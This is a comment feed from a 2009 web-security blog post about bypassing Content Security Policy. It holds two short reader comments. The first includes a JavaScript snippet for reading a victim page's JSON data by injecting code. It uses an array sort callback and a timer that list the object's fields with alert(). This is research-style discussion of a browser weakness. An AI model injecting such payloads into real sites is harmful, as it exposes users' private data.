Comments on: Bypassing CSP for fun, no profit http://www.thespanner.co.uk/2009/11/23/bypassing-csp-for-fun-no-profit/ Javascript blog with messed up syntax inside Thu, 26 Jan 2012 01:38:34 +0000 hourly 1 By: luoluo http://www.thespanner.co.uk/2009/11/23/bypassing-csp-for-fun-no-profit/#comment-1651 luoluo Thu, 03 Dec 2009 15:03:14 +0000 http://www.thespanner.co.uk/?p=545#comment-1651 Good idea! And we can get the data from the json by injecting the code: [{'friend':'luke','email':''}, 1].sort(function(x,y) { for (var o in x) { alert(o + ":" + x[o]); } }); setTimeout(function() { var x = data[0]; for (var o in x) { alert(o + ":" + x[o]); } }, 100);var data=[{'job':'done'}]; Good idea!

And we can get the data from the json by injecting the code:

[{'friend':'luke','email':''}, 1].sort(function(x,y) {
for (var o in x) {
alert(o + “:” + x[o]);
}
});
setTimeout(function() {
var x = data[0];

for (var o in x) {
alert(o + “:” + x[o]);
}
}, 100);var data=[{'job':'done'}];

]]> By: Michal Wiczynski http://www.thespanner.co.uk/2009/11/23/bypassing-csp-for-fun-no-profit/#comment-1635 Michal Wiczynski Mon, 23 Nov 2009 11:38:08 +0000 http://www.thespanner.co.uk/?p=545#comment-1635 Nice one! Nice one!

]]>